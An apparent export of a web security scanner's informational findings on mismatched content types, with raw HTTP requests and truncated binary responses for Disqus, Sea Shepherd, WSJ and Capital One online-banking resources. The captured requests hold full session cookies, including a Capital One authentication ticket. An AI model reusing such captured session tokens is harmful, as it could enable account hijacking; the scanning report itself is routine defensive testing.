Expires: Thu, 21 Jul 2011 20:42:58 GMT
Cache-Control: private, max-age=31536000
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 326
X-XSS-Protection: 1; mode=block

...... ......0.......(... ...@...............................................................................................................................?...w...g...............................
...[SNIP]...

29.51. http://mediacdn.disqus.com/1311382870/fonts/disqus-webfont.woff previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://mediacdn.disqus.com
Path:	/1311382870/fonts/disqus-webfont.woff

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /1311382870/fonts/disqus-webfont.woff HTTP/1.1
Host: mediacdn.disqus.com
Proxy-Connection: keep-alive
Referer: http://www.treehugger.com/files/2011/07/sea-shepherd-ship-detained-shetland-islands-million-dollar-bond-needed.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1937626060-1305368047702; disqus_unique=525920122861; __utmz=113869458.1309224200.12.12.utmcsr=tech.fortune.cnn.com|utmccn=(referral)|utmcmd=referral|utmcct=/2011/01/04/the-secs-challenge-in-the-secondary-market/; __utma=113869458.981292312.1305368048.1308922018.1309224200.12

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Sat, 23 Jul 2011 01:26:56 GMT
P3P: CP="DSP IDC CUR ADM DELi STP NAV COM UNI INT PHY DEM"
Access-Control-Allow-Origin: *
Content-Type: text/plain
Vary: Accept-Encoding
Content-Length: 5304
X-Varnish: 3188319962 3173797204
Cache-Control: max-age=2549450
Expires: Mon, 22 Aug 2011 01:30:22 GMT
Date: Sat, 23 Jul 2011 13:19:32 GMT
Connection: close

wOFF...............`........................FFTM...l........Z.V.GDEF........... .Y..OS/2.......E...`t.f.cmap................cvt .......6...6 ...fpgm...........e../.gasp................glyf...........p
...[SNIP]...

29.52. http://my.seashepherd.org/NetCommunity/view.image previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://my.seashepherd.org
Path:	/NetCommunity/view.image

Issue detail

The response contains the following Content-type statement:

Content-Type: image/pjpeg

The response states that it contains a JPEG image. However, it actually appears to contain unrecognised content.

Request

GET /NetCommunity/view.image?Id=424 HTTP/1.1
Host: my.seashepherd.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://my.seashepherd.org/NetCommunity/Page.aspx?pid=183
Cookie: __utma=208012304.1819747705.1311426916.1311426916.1311426916.1; __utmb=208012304.2.10.1311426916; __utmc=208012304; __utmz=208012304.1311426916.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; ASP.NET_SessionId=fvyp0fbxigboy4j5swvjb5y4; ShoppingCartCookieID=54d88002-2523-4fbd-86c9-a6a32b72f47d; __utma=267483154.1577314129.1311427012.1311427012.1311427012.1; __utmb=267483154.1.10.1311427012; __utmc=267483154; __utmz=267483154.1311427012.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 8322
Content-Type: image/pjpeg
Last-Modified: Tue, 17 Jun 2008 14:23:40 GMT
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
content-disposition: filename=photo424
X-Powered-By: ASP.NET
Date: Sat, 23 Jul 2011 13:17:38 GMT

......JFIF.............C......................
.....
...
.................................C....... .. ..............................................................."..............................
...[SNIP]...

29.53. http://online.wsj.com/public/page/0_0_WC_HeaderWeather-10005.html previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://online.wsj.com
Path:	/public/page/0_0_WC_HeaderWeather-10005.html

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /public/page/0_0_WC_HeaderWeather-10005.html HTTP/1.1
Host: online.wsj.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: application/html
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://online.wsj.com/article/SB10001424053111904233404576462461660747244.html?mod=WSJ_hp_LEFTWhatsNewsCollection
Cookie: djcs_route=01b7c75f-26da-44a9-8976-29a8b56945d6; DJSESSION=continent%3dna%7c%7czip%3d20001%2d20020%7c%7ccountry%3dus%7c%7cregion%3ddc%7c%7cORCS%3dna%2cus%7c%7ccity%3dwashington%7c%7clongitude%3d%2d77.0369%7c%7ctimezone%3dest%7c%7clatitude%3d38.8951; DJCOOKIE=ORC%3Dna%2Cus; wsjregion=na%2cus; s_vnum=1313987520537%26vn%3D1; s_invisit=true; s_dbfe=1311395520557; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Sat, 23 Jul 2011 04:31:56 GMT
Server: Apache/2.0.64 (Unix)
FastDynaPage-ServerInfo: sbkj2kapachep09 - Fri 07/22/11 - 00:28:58 EDT
Cache-Control: max-age=15
Expires: Sat, 23 Jul 2011 04:32:11 GMT
Vary: Accept-Encoding
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Content-Length: 924
Content-Type: text/html; charset=UTF-8

<ul class="local-info">
<li class="location"><a id="w_location" href="http://online.wsj.com/public/page/accuweather-detailed-forecast.html?name=New York, NY&location=10005&u=http%3A//www.accuweathe
...[SNIP]...

29.54. https://onlinebanking.capitalone.com/CapitalOne/Themes/TopTabMenu/Images/banner_01.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://onlinebanking.capitalone.com
Path:	/CapitalOne/Themes/TopTabMenu/Images/banner_01.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /CapitalOne/Themes/TopTabMenu/Images/banner_01.gif HTTP/1.1
Host: onlinebanking.capitalone.com
Connection: keep-alive
Referer: https://onlinebanking.capitalone.com/CapitalOne/Login.aspx
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=FB8DCF93533EFDA4; caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0400; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DA; __utma=106121180.767001896.1311366537.1311366537.1311366537.1; __utmb=106121180.1.10.1311366537; __utmc=106121180; __utmz=106121180.1311366537.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LP_GROUP=49; caponesn=af558df5VY%2FBjsIwDET%2FJXckO1C2dU9oJY574ANauWlEi0pSJbkA5d%2FXLblw8pNnPBpf7HX0rolUkvrjJMyTqhvnnV0MzzKMEVUfSZ3OZ9IAJRxA79IVcKcBEY5QyQEWBVRL2NJ4eo6z8b2Vw4IUAiBsln1RLu3sQ%2BKp%2FVjbp%2FllM9iGCekVCQ%2FZv2YDVKhVzRLy2pK6foxJ1ZH2pKRIpsl3K4keOmf6zDFxsitrUu6Rl3e%2B%2BZDZSY9hZXmtC%2BzM8C2839IYf6p%2F; lpVsGroupTracker=ndb; itc=CAPITALONE11NZZZDN1QSWZD4; AuthenticationTicket=5D770DCEFE7A9EDE06E90D1A8776FE697FA989F3F409A561BB48D892FB79A42676547A7A13D3067990A33F236A7FE6B62FB2C7D4BC56074D3F914D55D1BC9AEDADCE27D1BD7745046DFB2D336761D2ED68DAB1CEDD4BB5FE9B011DD3D39F4A796A4331DC88BE99DD6883DEB7619A26E04308BA1B174CC12CF1169C66B8ED440F3E985D76E1399126623DDBE813DB46F535E79AEFC69BA8E7AE218D46D3533D488CB85E061D7045B709BA74E708EA33D0C0A07B2232679D34D0D7A6A3FFD02853AAE7480D4FAF504EDFD849F5CDD87C194C4997E6FE12E47F7AC93344890608DEFB32790CADF4CBD724D19898; mbox=check#true#1311366883|session#1311366822807-148063#1311368683|disable#browser%20timeout#1311370442; InSession=1; TestCookie=OK; ASP.NET_SessionId=

Response

HTTP/1.1 200 OK
Cache-Control: max-age=28800
Content-Length: 4871
Content-Type: image/gif
Last-Modified: Mon, 31 Aug 2009 18:54:48 GMT
Accept-Ranges: bytes
ETag: "0c3b836c2aca1:45c2"
Header: :=
pics-label: (pics-1.1 http://www.icra.org/pics/vocabularyv03/ l gen true for := r (c 0 l 0 n 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 s0 v 0))
Date: Fri, 22 Jul 2011 20:34:07 GMT

.PNG
.
...IHDR.......P.....&Tc....tEXtSoftware.Adobe ImageReadyq.e<....PLTE..........2n.......Yd...........-.N{....z............................Ju..............s}......
9s5e.........&......Eq.7\...
...[SNIP]...

29.55. https://onlinebanking.capitalone.com/CapitalOne/Themes/TopTabMenu/Images/header_timeout.jpg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://onlinebanking.capitalone.com
Path:	/CapitalOne/Themes/TopTabMenu/Images/header_timeout.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain unrecognised content.

Request

GET /CapitalOne/Themes/TopTabMenu/Images/header_timeout.jpg HTTP/1.1
Host: onlinebanking.capitalone.com
Connection: keep-alive
Referer: https://onlinebanking.capitalone.com/CapitalOne/OAO/initiation.aspx?lob=COS&prod=87260IM&prodclass=MMA&itc=CAPITALONE11NZZZDN1QSWZD4&sessionid=FB8DCF93533EFDA4&br=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=FB8DCF93533EFDA4; caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0400; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DA; __utma=106121180.767001896.1311366537.1311366537.1311366537.1; __utmb=106121180.1.10.1311366537; __utmc=106121180; __utmz=106121180.1311366537.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LP_GROUP=49; caponesn=af558df5VY%2FBjsIwDET%2FJXckO1C2dU9oJY574ANauWlEi0pSJbkA5d%2FXLblw8pNnPBpf7HX0rolUkvrjJMyTqhvnnV0MzzKMEVUfSZ3OZ9IAJRxA79IVcKcBEY5QyQEWBVRL2NJ4eo6z8b2Vw4IUAiBsln1RLu3sQ%2BKp%2FVjbp%2FllM9iGCekVCQ%2FZv2YDVKhVzRLy2pK6foxJ1ZH2pKRIpsl3K4keOmf6zDFxsitrUu6Rl3e%2B%2BZDZSY9hZXmtC%2BzM8C2839IYf6p%2F; lpVsGroupTracker=ndb; itc=CAPITALONE11NZZZDN1QSWZD4; ASP.NET_SessionId=qofxkhqnqnpqg5zy0ieuaq55; TestCookie=OK; AuthenticationTicket=5D770DCEFE7A9EDE06E90D1A8776FE697FA989F3F409A561BB48D892FB79A42676547A7A13D3067990A33F236A7FE6B62FB2C7D4BC56074D3F914D55D1BC9AEDADCE27D1BD7745046DFB2D336761D2ED68DAB1CEDD4BB5FE9B011DD3D39F4A796A4331DC88BE99DD6883DEB7619A26E04308BA1B174CC12CF1169C66B8ED440F3E985D76E1399126623DDBE813DB46F535E79AEFC69BA8E7AE218D46D3533D488CB85E061D7045B709BA74E708EA33D0C0A07B2232679D34D0D7A6A3FFD02853AAE7480D4FAF504EDFD849F5CDD87C194C4997E6FE12E47F7AC93344890608DEFB32790CADF4CBD724D19898; mbox=check#true#1311366883|session#1311366822807-148063#1311368683

Response

HTTP/1.1 200 OK
Cache-Control: max-age=28800
Content-Length: 11429
Content-Type: image/jpeg
Last-Modified: Mon, 31 Aug 2009 18:54:48 GMT
Accept-Ranges: bytes
ETag: "0c3b836c2aca1:45c2"
Header: :=
pics-label: (pics-1.1 http://www.icra.org/pics/vocabularyv03/ l gen true for := r (c 0 l 0 n 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 s0 v 0))
Date: Fri, 22 Jul 2011 20:33:46 GMT

......JFIF.....d.d......Ducky.......U......Adobe.d...........................................................

.....................
...
.......................................................i.^..
...[SNIP]...

29.56. https://onlinebanking.capitalone.com/CapitalOne/Themes/TopTabMenu/Images/vs_img.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://onlinebanking.capitalone.com
Path:	/CapitalOne/Themes/TopTabMenu/Images/vs_img.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /CapitalOne/Themes/TopTabMenu/Images/vs_img.gif?Log=1&System=OLB&LOB=3800&PageName=Login&PageType=300&EventType=Page HTTP/1.1
Host: onlinebanking.capitalone.com
Connection: keep-alive
Referer: https://onlinebanking.capitalone.com/CapitalOne/Login.aspx
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=FB8DCF93533EFDA4; caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0400; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DA; __utma=106121180.767001896.1311366537.1311366537.1311366537.1; __utmb=106121180.1.10.1311366537; __utmc=106121180; __utmz=106121180.1311366537.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LP_GROUP=49; caponesn=af558df5VY%2FBjsIwDET%2FJXckO1C2dU9oJY574ANauWlEi0pSJbkA5d%2FXLblw8pNnPBpf7HX0rolUkvrjJMyTqhvnnV0MzzKMEVUfSZ3OZ9IAJRxA79IVcKcBEY5QyQEWBVRL2NJ4eo6z8b2Vw4IUAiBsln1RLu3sQ%2BKp%2FVjbp%2FllM9iGCekVCQ%2FZv2YDVKhVzRLy2pK6foxJ1ZH2pKRIpsl3K4keOmf6zDFxsitrUu6Rl3e%2B%2BZDZSY9hZXmtC%2BzM8C2839IYf6p%2F; lpVsGroupTracker=ndb; itc=CAPITALONE11NZZZDN1QSWZD4; AuthenticationTicket=5D770DCEFE7A9EDE06E90D1A8776FE697FA989F3F409A561BB48D892FB79A42676547A7A13D3067990A33F236A7FE6B62FB2C7D4BC56074D3F914D55D1BC9AEDADCE27D1BD7745046DFB2D336761D2ED68DAB1CEDD4BB5FE9B011DD3D39F4A796A4331DC88BE99DD6883DEB7619A26E04308BA1B174CC12CF1169C66B8ED440F3E985D76E1399126623DDBE813DB46F535E79AEFC69BA8E7AE218D46D3533D488CB85E061D7045B709BA74E708EA33D0C0A07B2232679D34D0D7A6A3FFD02853AAE7480D4FAF504EDFD849F5CDD87C194C4997E6FE12E47F7AC93344890608DEFB32790CADF4CBD724D19898; mbox=check#true#1311366883|session#1311366822807-148063#1311368683|disable#browser%20timeout#1311370442; InSession=1; TestCookie=OK; ASP.NET_SessionId=

Response

HTTP/1.1 200 OK
Cache-Control: max-age=28800
Content-Length: 631
Content-Type: image/gif
Last-Modified: Thu, 31 Mar 2011 22:06:44 GMT
Accept-Ranges: bytes
ETag: "0f2a6ebefefcb1:45c0"
Header: :=
pics-label: (pics-1.1 http://www.icra.org/pics/vocabularyv03/ l gen true for := r (c 0 l 0 n 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 s0 v 0))
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Date: Fri, 22 Jul 2011 20:34:08 GMT

......JFIF.....`.`.....C........... .
................... $.' ",#..(7),01444.'9=82<.342...C. .....2!.!22222222222222222222222222222222222222222222222222..........."..............................
...[SNIP]...

29.57. https://onlinebanking.capitalone.com/CapitalOne/Themes/TopTabMenu/images/banner_02.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://onlinebanking.capitalone.com
Path:	/CapitalOne/Themes/TopTabMenu/images/banner_02.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /CapitalOne/Themes/TopTabMenu/images/banner_02.gif HTTP/1.1
Host: onlinebanking.capitalone.com
Connection: keep-alive
Referer: https://onlinebanking.capitalone.com/CapitalOne/OAO/initiation.aspx?lob=COS&prod=87260IM&prodclass=MMA&itc=CAPITALONE11NZZZDN1QSWZD4&sessionid=FB8DCF93533EFDA4&br=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=FB8DCF93533EFDA4; caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0400; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DA; __utma=106121180.767001896.1311366537.1311366537.1311366537.1; __utmb=106121180.1.10.1311366537; __utmc=106121180; __utmz=106121180.1311366537.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LP_GROUP=49; caponesn=af558df5VY%2FBjsIwDET%2FJXckO1C2dU9oJY574ANauWlEi0pSJbkA5d%2FXLblw8pNnPBpf7HX0rolUkvrjJMyTqhvnnV0MzzKMEVUfSZ3OZ9IAJRxA79IVcKcBEY5QyQEWBVRL2NJ4eo6z8b2Vw4IUAiBsln1RLu3sQ%2BKp%2FVjbp%2FllM9iGCekVCQ%2FZv2YDVKhVzRLy2pK6foxJ1ZH2pKRIpsl3K4keOmf6zDFxsitrUu6Rl3e%2B%2BZDZSY9hZXmtC%2BzM8C2839IYf6p%2F; lpVsGroupTracker=ndb; itc=CAPITALONE11NZZZDN1QSWZD4; ASP.NET_SessionId=qofxkhqnqnpqg5zy0ieuaq55; TestCookie=OK; AuthenticationTicket=5D770DCEFE7A9EDE06E90D1A8776FE697FA989F3F409A561BB48D892FB79A42676547A7A13D3067990A33F236A7FE6B62FB2C7D4BC56074D3F914D55D1BC9AEDADCE27D1BD7745046DFB2D336761D2ED68DAB1CEDD4BB5FE9B011DD3D39F4A796A4331DC88BE99DD6883DEB7619A26E04308BA1B174CC12CF1169C66B8ED440F3E985D76E1399126623DDBE813DB46F535E79AEFC69BA8E7AE218D46D3533D488CB85E061D7045B709BA74E708EA33D0C0A07B2232679D34D0D7A6A3FFD02853AAE7480D4FAF504EDFD849F5CDD87C194C4997E6FE12E47F7AC93344890608DEFB32790CADF4CBD724D19898; mbox=check#true#1311366883|session#1311366822807-148063#1311368683

Response

HTTP/1.1 200 OK
Cache-Control: max-age=28800
Content-Length: 8204
Content-Type: image/gif
Last-Modified: Mon, 31 Aug 2009 18:54:48 GMT
Accept-Ranges: bytes
ETag: "0c3b836c2aca1:45c2"
Header: :=
pics-label: (pics-1.1 http://www.icra.org/pics/vocabularyv03/ l gen true for := r (c 0 l 0 n 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 s0 v 0))
Date: Fri, 22 Jul 2011 20:33:39 GMT

.PNG
.
...IHDR.......s......-......tEXtSoftware.Adobe ImageReadyq.e<....PLTE............Bn...........N{..-.Q~Is..jt......Eq..GU......\.....d..k.....!T..........a.........+iPy...........5E...........
...[SNIP]...

29.58. https://onlinebanking.capitalone.com/CapitalOne/Themes/TopTabMenu/images/banner_bg.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://onlinebanking.capitalone.com
Path:	/CapitalOne/Themes/TopTabMenu/images/banner_bg.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /CapitalOne/Themes/TopTabMenu/images/banner_bg.gif HTTP/1.1
Host: onlinebanking.capitalone.com
Connection: keep-alive
Referer: https://onlinebanking.capitalone.com/CapitalOne/OAO/initiation.aspx?lob=COS&prod=87260IM&prodclass=MMA&itc=CAPITALONE11NZZZDN1QSWZD4&sessionid=FB8DCF93533EFDA4&br=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=FB8DCF93533EFDA4; caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0400; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DA; __utma=106121180.767001896.1311366537.1311366537.1311366537.1; __utmb=106121180.1.10.1311366537; __utmc=106121180; __utmz=106121180.1311366537.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LP_GROUP=49; caponesn=af558df5VY%2FBjsIwDET%2FJXckO1C2dU9oJY574ANauWlEi0pSJbkA5d%2FXLblw8pNnPBpf7HX0rolUkvrjJMyTqhvnnV0MzzKMEVUfSZ3OZ9IAJRxA79IVcKcBEY5QyQEWBVRL2NJ4eo6z8b2Vw4IUAiBsln1RLu3sQ%2BKp%2FVjbp%2FllM9iGCekVCQ%2FZv2YDVKhVzRLy2pK6foxJ1ZH2pKRIpsl3K4keOmf6zDFxsitrUu6Rl3e%2B%2BZDZSY9hZXmtC%2BzM8C2839IYf6p%2F; lpVsGroupTracker=ndb; itc=CAPITALONE11NZZZDN1QSWZD4; ASP.NET_SessionId=qofxkhqnqnpqg5zy0ieuaq55; TestCookie=OK; AuthenticationTicket=5D770DCEFE7A9EDE06E90D1A8776FE697FA989F3F409A561BB48D892FB79A42676547A7A13D3067990A33F236A7FE6B62FB2C7D4BC56074D3F914D55D1BC9AEDADCE27D1BD7745046DFB2D336761D2ED68DAB1CEDD4BB5FE9B011DD3D39F4A796A4331DC88BE99DD6883DEB7619A26E04308BA1B174CC12CF1169C66B8ED440F3E985D76E1399126623DDBE813DB46F535E79AEFC69BA8E7AE218D46D3533D488CB85E061D7045B709BA74E708EA33D0C0A07B2232679D34D0D7A6A3FFD02853AAE7480D4FAF504EDFD849F5CDD87C194C4997E6FE12E47F7AC93344890608DEFB32790CADF4CBD724D19898; mbox=check#true#1311366883|session#1311366822807-148063#1311368683

Response

HTTP/1.1 200 OK
Cache-Control: max-age=28800
Content-Length: 554
Content-Type: image/gif
Last-Modified: Mon, 31 Aug 2009 18:54:48 GMT
Accept-Ranges: bytes
ETag: "0c3b836c2aca1:45c2"
Header: :=
pics-label: (pics-1.1 http://www.icra.org/pics/vocabularyv03/ l gen true for := r (c 0 l 0 n 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 s0 v 0))
Date: Fri, 22 Jul 2011 20:33:39 GMT

.PNG
.
...IHDR.......s.....n!.q....tEXtSoftware.Adobe ImageReadyq.e<...)PLTE......Z..6f....X..Dp....Fr....e........,_...........................................U~.......S|.h..]..~..'Z.......?m.`....
...[SNIP]...

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ots.optimize.webtrends.com
Path:	/ots/ots/js-3.1/311121/0badc71136ae076478bf83f1541081ef453a111b50cb3c0205ab52e9e820b250c59e028538eac0d71309572f0532760df61ffafd404f7f7ab96572302fa3ef4c6d5dc2c8cd1dc1a174788921c98221c53d967ba94189cac14a16e1f4053786961a7d48d1416a04630911413ae7cd25bf7f10707ad647ed34403ddb452b88e8846c648cd99df5c6f20b46880f9bb57eee5eae54eae4aefb7497150ad28a191670ac26b14d9dc24ee61c3e76cb42707268f260ed7c236543cc412c64472c1072fd236cab74511ddbbbf2526e65bd23f8eb5fa31b8a3212d5a23574333902101bcfc1e80b823a81ca1bc5dc9f7524b31d8674bfbd05ab898e36ca561f24d75e9cbba0646e1f09def18788d536fbb2e4d1097f346606f1ea29773e76a171d4fdcbcc241f33e8c92412a6c8c46f8c1c23faf2b4de0005d7bb03a656aa1e6c2c45a631db0d4de5f0aecaba1d66d217e1e28add9e4f9be3bd00db3412285787c900b2df5bc89de71a29c015b68fd911a704b7560ccb4bc5c899ac25da54e5b44e39dbef3f32d87c80f2a5b2885eb1ca74be75e769d072b660081d77084661fce65bdba0001c49f8d4fb2c8984048edab2fb9da97dab40eeb8c33e0267461c359d6bca5e7885045496d872995a0ef0948fe07b78583ea69e3dca935611c534fb9cacbf76f37e62c34fcc5be9d5e88df4a72430d41eb1a65b0c1c571a8eaf0f40f98fd7410db92b53a3cac79145a5ceaa5650c6e05e22b80403da493353bed5c8b31d09ff097cea50eb716193a69fd28bb5136a45a48c3402b5feac1ebc06cf5e3e73e24c4ca10c43eafd1886f08429f35962c20edeca367e3074915d5a0ca93443f0d8359b2904e55f2c8b109e75943f04ee5d8de83ef32be508211f8ee8f11e9ffa0e93ecf8aa9f4f9937140f7aeb761302bffba078554940735654b111b47f7616a372c4fe10bbcea7983c02ccadc9c9cee987ddba0049a140

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

Response

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ots.optimize.webtrends.com
Path:	/ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0b4b41a57f9fadff3b4403ba6b53da11aad8870297000d1d58bee13bc8ca059fde624ee792c4eff2ba07f6f45d7b1ce090cefe2d23d748dcadb7f4e9486e790e2c5e2033352659b4256b88303a637cca8448ceb87a0ded8d123b613ac0c1963e359c05e0230e29156736c2a6895f3c1cffa64b9fac27801e8a9146b54a1ff52d056f7f32e3f3a71fef59a588e7f0624829dbaa6efa3b690eabde83297c9688e28391fc14aac6545983263c0c8e390b045be24a4caad2cb5ea74b1748fc205b3f2c51e89a461f341026e5795fcce4d3188e72b0232ca46e3f76599d9c6acfd4c41d4d07573dd137afaca4320220da7d25dd280c6db34bc4f161c396ddaf9d702beafd54328f8656d10a931162f8fb320b997e456b7f579ca99c3819174bdf432231b623d87320c20879e9063c31532f2265f999025ef6544ec230901b74370747a0cfb5f3be20a7d3377877f9bc09bdd0148dc46e6f5c65b2cf0325094b6eba36eca3f9526ef9c9f00876ab065933f067123a51f6a478170716e86c83bbee58dc85a1b26d6ede86650472a8da199989f4f7ce60ef9c141e96c196e2044d7833454dbb20b9f0ad7c5f92328dc654a9934521f753f31faa7515cab99f6833a9340ce09efd927b3aa9154c3e521fcc0ee3556124839da980882ad6cefd9a92b87de7656cc4de422fd9f9bd41bbc084dadd762251153a3b4ea20ae55445a1a722f24b304079665

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

Response

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ots.optimize.webtrends.com
